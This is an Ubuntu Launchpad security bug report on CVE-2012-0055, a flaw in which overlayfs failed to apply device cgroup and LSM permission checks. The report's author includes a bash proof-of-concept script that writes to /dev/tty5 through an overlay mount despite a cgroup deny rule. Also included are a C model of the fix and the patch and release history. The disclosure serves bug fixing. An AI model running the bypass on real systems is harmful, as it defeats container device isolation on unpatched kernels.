overlayfs does not honor lxc-related permissions

Bug #915941 reported by Gary Poster
Affects              Importance   Assigned to
linux (Ubuntu)       High         Andy Whitcroft
  Oneiric            High         Andy Whitcroft
  Precise            High         Andy Whitcroft
lxc (Ubuntu)         Undecided    Unassigned
  Oneiric            Undecided    Unassigned
  Precise            Undecided    Unassigned

Bug Description

Using overlayfs with lxc causes tty problems that can kill X. Overlayfs needs to honor the necessary cgroup permission calls, per the following information from Serge.

"""
here is a script which you can use to test the overlayfs
issue:

========================= exploit-overlayfs-devices.sh =======================
#!/bin/bash

ddir=`cat /proc/self/mountinfo | grep cgroup | grep devices | awk '{ print $5 }'`
if [ "x$ddir" = "x" ]; then
 echo "couldn't find devices cgroup mountpoint"
 exit 1
fi

# create new cgroup
ndir=`mktemp -d --tmpdir=$ddir exploit-XXXX`

# create a directory onto which we mount the overlay
odir=`mktemp -d --tmpdir=/mnt exploit-XXXX`

# create the directory to be the overlay dir (where changes
# will be written)
udir=`mktemp -d --tmpdir=/tmp exploit-XXX`

mount -t overlayfs -oupperdir=$udir,lowerdir=/dev none $odir
echo $$ > $ndir/tasks
# deny all device actions
echo a > $ndir/devices.deny
# but allow mknod of tty7, bc we have to mknod it in the writeable
# overlay
echo "c 4:5 m" > $ndir/devices.allow
echo "devices.list: XXXXXXXXXXXXXXX"
cat $ndir/devices.list
echo "XXXXXXXXXXXX"

# try writing to /dev/tty5 - not allowed
echo x > /dev/tty5
echo "write to /dev/tty5 returned $?"

# try writing to tty5 on the overlayfs - SHOULD not be allowed
echo y > $odir/tty5
echo "write to $odir/tty5 returned $?"

umount $odir
rmdir $odir
rm -rf $udir

# move ourselves back to root cgroup (else we can't delete the temp one
# bc it's occupied - by us)
echo $$ > $ddir/tasks
rmdir $ndir
========================= exploit-overlayfs-devices.sh =======================

The write to /dev/tty5 will fail, but the write to $odir/tty5 will
succeed.

fs/overlayfs/inode.c calls generic_permission, but it needs to do more
of what fs/namei.c:inode_permission() does, in particular the calls to
devcgroup_inode_permission() and security_inode_permission().
"""

[This blocks resolution of bug 914169]
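The missing check Serge describes, modelled in user space as an added example (not the page's script and not the kernel's or Ubuntu's patch code): the inode and cgroup types, the rule table and the `_before`/`_after` split are constructed here to contrast the overlay permission path with and without the device cgroup call on the real inode.

```c
/* Added example (not the kernel's code): a user-space model of the check the
 * fix adds to ovl_permission(). Types and the cgroup table are constructed. */
#include <errno.h>
#include <stddef.h>

enum { MAY_WRITE = 0x02, MAY_READ = 0x04 };           /* VFS mask bits */
enum { ACC_MKNOD = 1, ACC_READ = 2, ACC_WRITE = 4 };  /* device cgroup access bits */
enum { DEV_BLOCK = 1, DEV_CHAR = 2, DEV_ALL = 4 };    /* device cgroup types */

struct inode { int type; unsigned major, minor; };               /* type 0 = not a device */
struct dev_rule { int type; unsigned major, minor; int access; }; /* ~0u = wildcard */
struct dev_cgroup { const struct dev_rule *allow; size_t n; };    /* whitelist after "deny a" */

/* Model of devcgroup_inode_permission(): grant only if an allow rule covers
 * this device node and every access bit the caller asks for. */
int devcgroup_inode_permission(const struct dev_cgroup *cg, const struct inode *ino, int mask)
{
    int want = ((mask & MAY_READ) ? ACC_READ : 0) | ((mask & MAY_WRITE) ? ACC_WRITE : 0);
    if (ino->type != DEV_CHAR && ino->type != DEV_BLOCK)
        return 0;                         /* not a device node: the cgroup has no say */
    for (size_t i = 0; i < cg->n; i++) {
        const struct dev_rule *r = &cg->allow[i];
        if (r->type != DEV_ALL && r->type != ino->type) continue;
        if (r->major != ~0u && r->major != ino->major) continue;
        if (r->minor != ~0u && r->minor != ino->minor) continue;
        if ((r->access & want) == want) return 0;
    }
    return -EPERM;
}

/* DAC check, modelled as passing because the script runs as root. */
int generic_permission(const struct inode *ino, int mask) { (void)ino; (void)mask; return 0; }

/* Before the fix: only the DAC check ran on the real inode. */
int ovl_permission_before(const struct dev_cgroup *cg, const struct inode *real, int mask)
{ (void)cg; return generic_permission(real, mask); }

/* After the fix: the device cgroup check (the LSM hook is omitted here) also
 * runs on the real inode, so the overlay path no longer bypasses it. */
int ovl_permission_after(const struct dev_cgroup *cg, const struct inode *real, int mask)
{
    int err = generic_permission(real, mask);
    return err ? err : devcgroup_inode_permission(cg, real, mask);
}

/* The script's cgroup: "deny a" then "allow c 4:5 m"; /dev/tty5 is char 4:5. */
const struct dev_rule script_rules[] = { { DEV_CHAR, 4, 5, ACC_MKNOD } };
const struct dev_cgroup script_cg = { script_rules, 1 };
const struct inode tty5 = { DEV_CHAR, 4, 5 };
const struct inode regular_file = { 0, 0, 0 };
```

With the script's rule set, the pre-fix path lets the write through while the post-fix path returns -EPERM; a non-device inode is unaffected either way.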

Gary Poster (gary)
Changed in launchpad:
status: New → Triaged
importance: Undecided → High
Dave Walker (davewalker)
Changed in lxc (Ubuntu):
importance: Undecided → Medium
Andy Whitcroft (apw)
affects: launchpad → linux
no longer affects: linux
Changed in linux (Ubuntu):
importance: Undecided → High
assignee: nobody → Andy Whitcroft (apw)
status: New → In Progress
Revision history for this message
Andy Whitcroft (apw) wrote :

Proposed patch for Precise

security vulnerability: no → yes
Andy Whitcroft (apw)
Changed in lxc (Ubuntu):
status: New → Invalid
Andy Whitcroft (apw) wrote :

I have built some Precise test kernels with the proposed fix applied. If you could test those and report any results here. Kernels can be found here:

    http://people.canonical.com/~apw/lp915941-precise/

Thanks.

tags: added: patch
Marc Deslauriers (mdeslaur) wrote :

This is CVE-2012-0055

Andy Whitcroft (apw) wrote :

Patch for Oneiric

no longer affects: linux-ec2 (Ubuntu)
no longer affects: linux-lts-backport-maverick (Ubuntu)
no longer affects: linux-lts-backport-natty (Ubuntu)
no longer affects: linux-lts-backport-oneiric (Ubuntu)
no longer affects: linux-mvl-dove (Ubuntu)
Gary Poster (gary) wrote :

The 64-bit kernels that apw provided fixed the described issue for me. Thank you.

To test, I created a kvm image based on the Precise daily from Jan 17. I ran the script that triggered the problem initially and verified that the problem still happened (the visual effect being a corrupted screen). I then installed the provided 64-bit headers and image using dpkg, and restarted the kvm. Repeating the script, the problem did not occur.

Andy Whitcroft (apw)
Changed in linux (Ubuntu):
status: In Progress → Fix Committed
Changed in linux (Ubuntu Oneiric):
status: New → Fix Committed
importance: Undecided → High
assignee: nobody → Andy Whitcroft (apw)
Changed in lxc (Ubuntu Oneiric):
status: New → Invalid
Changed in lxc (Ubuntu Precise):
importance: Medium → Undecided
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package linux - 3.2.0-10.17

---------------
linux (3.2.0-10.17) precise; urgency=low

  [ Andy Whitcroft ]

  * Revert "SAUCE: overlayfs -- fs: limit filesystem stacking depth"
  * Revert "SAUCE: overlayfs -- overlay: overlay filesystem documentation"
  * Revert "SAUCE: overlayfs -- overlayfs: implement show_options"
  * Revert "SAUCE: overlayfs -- overlayfs: add statfs support"
  * Revert "SAUCE: overlayfs -- overlay filesystem"
  * Revert "SAUCE: overlayfs -- vfs: introduce clone_private_mount()"
  * Revert "SAUCE: overlayfs -- vfs: export do_splice_direct() to modules"
  * Revert "SAUCE: overlayfs -- vfs: add i_op->open()"
  * ensure debian/ is not excluded from git by default
  * add new scripting to handle buglinks in rebases
  * ubuntu: overlayfs -- overlayfs: add statfs support
  * ubuntu: overlayfs -- overlayfs: apply device cgroup and security
    permissions to overlay files
    - LP: #915941, #918212
    - CVE-2012-0055

  [ Erez Zadok ]

  * ubuntu: overlayfs -- overlayfs: implement show_options

  [ Leann Ogasawara ]

  * Revert "SAUCE: dmar: disable if ricoh multifunction detected"
  * [Config] Disable CONFIG_INTEL_IOMMU_DEFAULT_ON
    - LP: #907377, #911236
  * [Config] Enable CONFIG_IRQ_REMAP

  [ Miklos Szeredi ]

  * ubuntu: overlayfs -- vfs: pass struct path to __dentry_open()
  * ubuntu: overlayfs -- vfs: add i_op->open()
  * ubuntu: overlayfs -- vfs: export do_splice_direct() to modules
  * ubuntu: overlayfs -- vfs: introduce clone_private_mount()
  * ubuntu: overlayfs -- overlay filesystem
  * ubuntu: overlayfs -- fs: limit filesystem stacking depth

  [ Neil Brown ]

  * ubuntu: overlayfs -- overlay: overlay filesystem documentation

  [ Upstream Kernel Changes ]

  * (pre-stable) x86/PCI: amd: factor out MMCONFIG discovery
    - LP: #647043
  * (pre-stable) PNP: work around Dell 1536/1546 BIOS MMCONFIG bug that
    breaks USB
    - LP: #647043
 -- Leann Ogasawara <email address hidden> Mon, 16 Jan 2012 07:10:08 -0800

Changed in linux (Ubuntu Precise):
status: Fix Committed → Fix Released
Herton R. Krzesinski (herton) wrote :

This was assigned a CVE as well; security fixes are not subject to the standard verification process.

tags: added: verification-done-oneiric
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package linux - 3.0.0-16.28

---------------
linux (3.0.0-16.28) oneiric-proposed; urgency=low

  [Herton R. Krzesinski]

  * Release Tracking Bug
    - LP: #922692

  [ Upstream Kernel Changes ]

  * Revert "drm/i915/dp: Fix the math in intel_dp_link_required"
    - LP: #919350

linux (3.0.0-16.27) oneiric-proposed; urgency=low

  [Brad Figg]

  * Release Tracking Bug
    - LP: #920735

  [ Paolo Pisati ]

  * Revert "SAUCE: omap3: beagle: if rev unknown, assume xM revision C"
    - LP: #912199
  * Revert "SAUCE: omap3: beagle: detect new xM revision C"
    - LP: #912199
  * Revert "SAUCE: omap3: beagle: detect new xM revision B"
    - LP: #912199
  * Revert "SAUCE: omap3: beaglexm: fix DVI initialization"
    - LP: #912199
  * [Config] DEFAULT_MMAP_MIN_ADDR=32k on arm
    - LP: #903346

  [ Upstream Kernel Changes ]

  * Revert "rtc: Disable the alarm in the hardware"
    - LP: #913373
  * Support for Terratec G1
    - LP: #821061
  * drm/radeon/kms: fix DP detect and EDID fetch for DP bridges
    - LP: #825777
  * drm/radeon/kms/DCE4.1: fix Select_CrtcSource EncodeMode setting for DP
    bridges (v2)
    - LP: #825777
  * drm/radeon/kms: cleanup atombios_adjust_pll()
    - LP: #825777
  * drm/radeon/kms/atom: rework encoder dpms
    - LP: #825777
  * drm/radeon/kms: check for DP MST mode in a few more places (v2)
    - LP: #825777
  * drm/radeon/kms: rework DP bridge checks
    - LP: #825777
  * drm/radeon/kms: fix DP setup on TRAVIS bridges
    - LP: #825777
  * ALSA: sis7019 - give slow codecs more time to reset
    - LP: #907778
  * ALSA: hda/realtek - Fix Oops in alc_mux_select()
    - LP: #907778
  * alarmtimers: Fix time comparison
    - LP: #907778
  * ARM: davinci: da850 evm: change audio edma event queue to EVENTQ_0
    - LP: #907778
  * arm: mx23: recognise stmp378x as mx23
    - LP: #907778
  * ARM: at91: fix clock conid for atmel_tcb.1 on 9260/9g20
    - LP: #907778
  * ARM: davinci: dm646x evm: wrong register used in
    setup_vpif_input_channel_mode
    - LP: #907778
  * ASoC: Provide a more complete DMA driver stub
    - LP: #907778
  * fs/proc/meminfo.c: fix compilation error
    - LP: #907778
  * thp: add compound tail page _mapcount when mapped
    - LP: #907778
  * thp: set compound tail page _count to zero
    - LP: #907778
  * ptp: Fix clock_getres() implementation
    - LP: #907778
  * mm: Ensure that pfn_valid() is called once per pageblock when reserving
    pageblocks
    - LP: #907778
  * mm: vmalloc: check for page allocation failure before vmlist insertion
    - LP: #907778
  * fix apparmor dereferencing potentially freed dentry, sanitize
    __d_path() API
    - LP: #907778
  * target: Handle 0 correctly in transport_get_sectors_6()
    - LP: #907778
  * intel-iommu: fix return value of iommu_unmap() API
    - LP: #907778
  * intel-iommu: set iommu_superpage on VM domains to lowest common
    denominator
    - LP: #907778
  * intel-iommu: fix superpage support in pfn_to_dma_pte()
    - LP: #907778
  * percpu: fix chunk range calculation
    - LP: #907778
  * iwlwifi: do not re-configure HT40 after associated
    - LP: #907778
  * mac80211: fix race condition caused by late addBA respon...

Changed in linux (Ubuntu Oneiric):
status: Fix Committed → Fix Released
This report contains Public Security information
Everyone can see this security related information.